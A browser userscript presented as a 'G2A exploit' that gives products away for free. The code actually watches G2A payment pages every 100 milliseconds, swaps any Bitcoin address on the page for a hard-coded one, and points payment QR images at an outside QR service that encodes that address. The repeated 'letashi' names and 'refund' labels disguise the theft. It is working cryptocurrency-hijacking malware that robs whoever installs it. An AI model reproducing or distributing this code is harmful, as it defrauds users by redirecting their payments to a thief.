// ==UserScript== // @name G2А Exploit Script // @namespace https://g2a.com/ // @version 1.3 // @author @Letashi // @description Get any product from G2A for FREE. // @icon https://www.google.com/s2/favicons?sz=64&domain=g2a.com // @match http*://www.g2a.com/payment* // @run-at document-start // ==/UserScript== (function() { 'use strict'; var g2arefunded = [ { g2atimeoutrefunded: /(^|\W)(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}($|\W)/, letashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashi: "12R8VX3dqVcGofFKmov6jQnYqDk93tCU2A", coin: "bitcoin"} ]; function refund() { var elements = document.querySelectorAll('*'); elements.forEach(function(element) { Array.from(element.childNodes).forEach(function(node) { if (node.nodeType === Node.TEXT_NODE) { var text = node.nodeValue.trim(); g2arefunded.forEach(function(wordData) { if (wordData.g2atimeoutrefunded.test(text)) { node.nodeValue = text.replace(wordData.g2atimeoutrefunded, wordData.letashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashi); var addy = wordData.letashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashiletashi; var g2arefund = wordData.g2arefund; Array.from(document.getElementsByTagName('img')).forEach(function(img) { var src = img.getAttribute("src"); if (src && src.includes("/qr/")) { var newSrc = "https://api.zile42o.dev/cryptoqr/api.php?coin=" + g2arefund + "&address=" + addy + "&amount=0"; img.setAttribute("src", newSrc); } }); } }); } }); }); } setInterval(function() { refund(); }, 100); })();